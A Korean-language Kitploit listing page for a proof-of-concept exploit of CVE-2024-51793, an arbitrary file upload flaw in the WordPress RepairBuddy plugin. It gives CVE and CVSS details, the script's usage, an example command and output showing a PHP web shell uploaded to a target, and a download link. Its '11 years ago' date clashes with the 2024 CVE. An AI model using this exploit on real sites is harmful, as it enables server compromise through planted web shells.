Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-51793 — 워드프레스 RepairBuddy 플러그인 <= 3.8115 - 임의 파일 업로드 취약점 | Kitploit
도구/GitHubGitHub/nxploited/cve-2024-51793
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubnxploited/cve-2024-51793

CVE-2024-51793

워드프레스 RepairBuddy 플러그인 <= 3.8115 - 임의 파일 업로드 취약점

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🛡️ WordPress RepairBuddy 플러그인 익스플로잇

📜 CVE 정보

CVE-ID: CVE-2024-51793
게시일: 2024-11-11
업데이트: 2024-11-11
제목: WordPress RepairBuddy 플러그인 <= 3.8115 - 임의 파일 업로드 취약점
설명:
Webful Creations Computer Repair Shop의 위험한 유형 파일 무제한 업로드 취약점으로, 웹 서버에 웹 셸을 업로드할 수 있습니다. 이 문제는 Computer Repair Shop에 영향을 미칩니다: n/a부터 3.8115까지.

CWE:

  • CWE-434: 위험한 유형 파일의 무제한 업로드

CVSS:

  • 점수: 10.0 (치명적)
  • 버전: 3.1
  • 벡터 문자열: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

📋 설명

이는 WordPress RepairBuddy 플러그인 버전 <= 3.8115의 임의 파일 업로드 취약점에 대한 개념 증명 익스플로잇입니다. 이 익스플로잇을 통해 공격자는 취약한 서버에 웹 셸을 업로드할 수 있습니다.

⚙️ 요구 사항

  • Python 3.x
  • requests 라이브러리 (pip install requests)

🚀 사용법

root@kitploit:~
usage: 
CVE-2024-51793.py [-h] -u URL [-shell SHELL]

WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL
  -shell SHELL   Shell code to upload

📖 예제

root@kitploit:~
python 
CVE-2024-51793.py -u http://target.com/wordpress

📝 출력

root@kitploit:~
Exploit By : Nxploit Khaled Alenazi,

🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php

👨‍💻 저자

익스플로잇 제작: Nxploited, Khaled Alenazi

도구 다운로드